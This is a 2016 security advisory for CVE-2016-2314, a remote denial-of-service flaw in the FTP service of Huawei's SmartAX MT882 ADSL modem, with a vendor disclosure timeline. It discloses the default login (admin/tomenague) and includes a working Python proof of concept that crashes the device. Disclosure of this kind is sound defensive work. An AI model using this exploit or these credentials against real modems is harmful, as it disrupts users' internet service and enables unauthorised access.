- Topic: Denial of Service (DoS) vulnerability in Huawei SmartAX MT882 ADSL Modem.
- Class: Remote DoS.
- Severity: Medium.
- Date published: 2016-02-11
- Date of last update: 2016-02-11
- CVE number: CVE-2016-2314
- Credits: Déborah Valeria Higa
- Affects:
- Product name: Huawei SmartAX MT882 ADSL Modem.
- Affected version: V200R002B022 Arg
I. Background
Huawei SmartAX MT882 includes a GlobespanVirata ftpd 1.0 (FTP) service at TCP port 21.
II. Problem Description
The FTP service fails with the following steps:
- Log in with USER and PASS.
- Receive response.
- Make a directory with MKD and a directory name with 0xFA of length.
- Send another command which works with files and directories like CWD, RMD, XRMD, MKD, XMKD and DELE.
- Terminate command connection with QUIT.
- Receive response.
III. Impact
A remote attacker can log in with the default user (admin) and password (tomenague), follow the described steps and cause a DoS, suspending the operation of the device.
IV. Supporting Technical Details
Proof of concept:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.0.0.2', 21))
s.send('USER admin\r\n')
s.send('PASS tomenague\r\n')
print s.recv(4096)
s.send('MKD ' + 'A'*0xFA + '\r\n')
s.send('DMK A\r\n')
s.send('QUIT\r\n')
print s.recv(4096)
V. Report Timeline
- 2015-10-31: contact Huawei Product Security Incident Response Team (PSIRT) to inform them that two vulnerabilities has been found in Huawei SmartAX MT882 ADSL Modem. Send a draft advisory with technical details and PoCs files.
- 2015-11-01: Huawei PSIRT acknowledges reception of the advisory.
- 2015-11-11: Huawei PSIRT confirms FTP vulnerability and asks both PoCs and more information about WHIP service.
- 2015-11-13: send requested information.
- 2015-11-16: Huawei PSIRT acknowledges.
- 2015-11-25: Huawei PSIRT informs that the warranty for the MT882 has expired, but confirm that the replacement product MT882a does not have the two vulnerabilities.
- 2015-11-25: inform that MT882 product is still distributed by Argentina’s ISP Arnet.
- 2015-11-27: Huawei PSIRT acknowledges.
- 2016-01-15: request a status update.
- 2016-01-15: Huawei PSIRT informs that they have contacted Argentina’s front line which have notified to Arnet, but customer didn’t give the result. Argentina’s front line will ask customer again next week.
- 2016-01-22: Huawei PSIRT informs that Arnet uses HG532s as replacement.
- 2016-01-23: contact to inform that the investigation is considered closed and asks for confirmation.
- 2016-01-25: Huawei PSIRT acknowledges.
- 2016-02-11: Security Advisory published.